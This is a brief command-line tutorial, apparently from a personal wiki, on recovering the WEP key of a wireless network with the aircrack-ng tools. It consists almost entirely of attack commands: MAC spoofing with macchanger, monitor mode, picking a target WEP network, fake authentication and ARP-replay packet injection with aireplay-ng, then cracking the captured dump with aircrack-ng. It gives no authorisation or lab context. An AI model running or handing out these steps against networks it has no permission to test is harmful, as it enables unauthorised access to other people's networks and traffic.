Install software

This tutorial uses aircrack-ng available as a Debian package or in the Backtrack live CD, known better known as Kali Linux.

Setup

We will use the following variables here:

interface=wlan1
essid=test
mac=00:11:22:33:44:55

This will make the device listen to all frames coming in:

airmon-ng stop $interface
ifconfig $interface down
macchanger --mac $mac $interface
airmon-ng start $interface

This will display all networks as they are found. You are looking for one with WEP in the ENC column.

airodump-ng $interface

Copy-paste the line of the network you want to inspect. The BSSID, CH and ESSID fields are the important bits here.

channel=7
bssid=...

airodump-ng -c $channel -w $essid --bssid $bssid $interface

In another window:

aireplay-ng -1 0 -a $bssid -h $mac -e $essid $interface

You are loking for the following message:

Association successful

Now we need to generate more packets:

aireplay-ng -3 -b $bssid -h $mac $interface

The #Data column in the airodump-ng window should start going up. Wait until it goes above 10 000. More is better.

Now decode that dump file to find out the secret WEP key:

aircrack-ng -b $bssid $essid.cap

The WEP key appears next to KEY FOUND. The key has extra colons added that should be removed.

Remove the monitoring interface:

airmon-ng stop $interface
iw dev $interface del

Otherwise network-manager freaks out and fills daemon.log.

Created 2015-05-02 16:23. Edited 2017-11-03 12:10.